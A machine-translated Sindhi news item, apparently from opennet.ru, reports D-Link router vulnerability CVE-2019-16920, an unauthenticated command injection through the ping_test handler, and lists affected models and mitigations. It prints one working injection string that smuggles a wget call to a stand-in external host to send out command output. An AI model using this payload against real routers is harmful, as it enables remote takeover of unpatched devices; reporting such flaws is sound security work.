ڊي-لنڪ راؤٽرز ۾ ريموٽ طور تي استحصال جوڳو نقصان

ڊي-لنڪ وائرليس روٽرز ۾ سڃاڻپ خطرناڪ ڪمزوري (CVE-2019-16920)، جيڪو توهان کي "ping_test" هينڊلر ڏانهن خاص درخواست موڪلڻ سان، ڊوائيس جي پاسي کان ڪوڊ تي عمل ڪرڻ جي اجازت ڏئي ٿو، بغير تصديق جي رسائي.

دلچسپ ڳالهه اها آهي ته، فرم ویئر ڊولپرز جي مطابق، "ping_test" ڪال کي صرف تصديق ٿيڻ کان پوء عمل ڪيو وڃي، پر حقيقت ۾ اهو ڪنهن به صورت ۾ سڏيو ويندو آهي، ويب انٽرفيس ۾ لاگ ان ٿيڻ کان سواء. خاص طور تي، جڏهن apply_sec.cgi اسڪرپٽ تائين رسائي حاصل ڪندي ۽ "action=ping_test" پيٽرول کي پاس ڪندي، اسڪرپٽ تصديق واري صفحي ڏانهن ريڊريٽ ڪري ٿو، پر ساڳئي وقت ping_test سان لاڳاپيل عمل انجام ڏئي ٿو. ڪوڊ کي عمل ڪرڻ لاء، هڪ ٻيو نقصان خود ping_test ۾ استعمال ڪيو ويو، جيڪو پنگ يوٽيليٽي کي سڏي ٿو بغير جانچ ڪرڻ لاء IP پتي جي صحيحيت جي صحيح جانچ ڪرڻ کان سواء. مثال طور، ويجٽ يوٽيلٽي کي ڪال ڪرڻ لاءِ ۽ "echo 1234" ڪمانڊ جا نتيجا خارجي ميزبان ڏانهن منتقل ڪرڻ لاءِ، صرف وضاحت ڪريو "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

ڊي-لنڪ راؤٽرز ۾ ريموٽ طور تي استحصال جوڳو نقصان

هيٺ ڏنل ماڊلز ۾ ڪمزوري جي موجودگي سرڪاري طور تي تصديق ڪئي وئي آهي:

  • DIR-655 firmware سان 3.02b05 يا پراڻا؛
  • DIR-866L firmware سان 1.03b04 يا پراڻا؛
  • DIR-1565 firmware سان 1.01 يا پراڻا؛
  • DIR-652 (مسئلو فرم ويئر ورزن بابت ڪا به ڄاڻ نه ڏني وئي آهي)

انهن ماڊلز جي سپورٽ جي مدت اڳ ۾ ئي ختم ٿي چڪي آهي، تنهنڪري ڊي-لنڪ ڏنل آهي، جيڪو انهن لاءِ تازه ڪاري جاري نه ڪندو ته جيئن نقصان کي ختم ڪيو وڃي، انهن کي استعمال ڪرڻ جي سفارش نه ڪندو آهي ۽ انهن کي نئين ڊوائيسز سان تبديل ڪرڻ جي صلاح ڏيندو آهي. حفاظتي ڪم جي طور تي، توهان ويب انٽرفيس تائين رسائي کي صرف قابل اعتماد IP پتي تائين محدود ڪري سگهو ٿا.

اهو بعد ۾ دريافت ڪيو ويو ته ڪمزور پڻ هو متاثر ڪري ٿو ماڊل DIR-855L، DAP-1533، DIR-862L، DIR-615، DIR-835 ۽ DIR-825، اپڊيٽ جاري ڪرڻ جا منصوبا جن لاءِ اڃا تائين معلوم ناهي.

جو ذريعو: opennet.ru

تبصرو شامل ڪريو